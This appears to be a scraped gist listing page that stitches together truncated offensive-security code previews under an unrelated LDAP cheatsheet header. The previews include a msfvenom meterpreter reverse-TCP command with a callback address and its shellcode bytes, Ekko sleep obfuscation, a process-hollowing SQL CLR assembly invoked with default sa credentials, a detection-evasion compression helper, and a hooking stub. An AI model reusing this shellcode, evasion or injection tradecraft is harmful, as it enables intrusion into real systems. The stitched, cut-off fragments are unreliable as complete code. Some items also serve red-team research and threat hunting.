title | author | date | source | notoc |
---|---|---|---|---|
LDAP Search Filter Cheatsheet |
Jon LaBelle |
January 4, 2021 |
true |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
int main() { | |
HANDLE file = CreateFileA(".\\test.txt", GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL|FILE_ATTRIBUTE_ENCRYPTED|FILE_FLAG_DELETE_ON_CLOSE, NULL); | |
if (!file || file == INVALID_HANDLE_VALUE) { | |
return GetLastError(); | |
} | |
CloseHandle(file); | |
return 0; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
Compression using undocumented API in rdpbase.dll | |
RDPCompressEx supports four algorithms : MPPC-8K, MPPC-64K, NCRUSH and XCRUSH. | |
This code supports all except NCRUSH. | |
The MPPC compression ratio is very similar to LZSS, so this could be quite useful for shellcode trying to evade detection. | |
NCRUSH compression appears to work but fails for decompression. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Collections.Generic; | |
using System.Linq; | |
using System.Runtime.CompilerServices; | |
using System.Net; | |
using System.Reflection; | |
using System.Runtime.InteropServices; | |
namespace Test | |
{ | |
// CCOB IS THE GOAT |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <Core.h> | |
#include <Win32.h> | |
#include <Structs.h> | |
#include <Sleep.h> | |
#include <Utils.h> | |
SEC( text, C ) VOID Ekko ( DWORD SleepTime, PINSTANCE Instance) | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\hollow.cs | |
//SQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m clr -o c:\temp\hollow.dll -f BaconTime | |
using System; | |
using System.Data; | |
using System.Data.SqlClient; | |
using System.Data.SqlTypes; | |
using System.Diagnostics; | |
using System.IO; | |
using System.Runtime.InteropServices; | |
using Microsoft.SqlServer.Server; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <stdio.h> | |
extern WORD WINAPI RtlRunOnceExecuteOnce(RTL_RUN_ONCE *once, PRTL_RUN_ONCE_INIT_FN func, void *param, void **context); | |
typedef ULONG (WINAPI* RTL_RUN_ONCE_INIT_FN)(_Inout_ PRTL_RUN_ONCE RunOnce, _Inout_opt_ PVOID Parameter, _Inout_opt_ PVOID *Context); | |
// msfvenom LPORT=8080 LHOST=172.16.219.1 -p windows/x64/meterpreter/reverse_tcp -f c | |
unsigned char shellcode_bin[] = | |
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50" | |
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Runtime.CompilerServices; | |
using System.Runtime.InteropServices; | |
namespace ShittyHook | |
{ | |
internal class Program | |
{ |
The following script is designed to create artifacts that teams can use to hunt, new or interesting capabilities.
The following table top is based on the code here: https://github.com/code-scrap/DynamicWrapperDotNet
This script is self-contained. It should dynamically write a DLL to disk and load it in to cscript.exe
To Invoke cscript.exe stranger_things.js
This example expects a 64bit system.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Copyright (C) 2022 Evan McBroom | |
// If you are using Visual Studio, you will need to disable the "Edit and Continue" feature. | |
// Prng based off of Parker Miller's | |
// "Multiplicative Linear Congruential Generator" | |
// https://en.wikipedia.org/wiki/Lehmer_random_number_generator | |
namespace mlcg { | |
constexpr uint32_t modulus() { | |
return 0x7fffffff; | |
} |
NewerOlder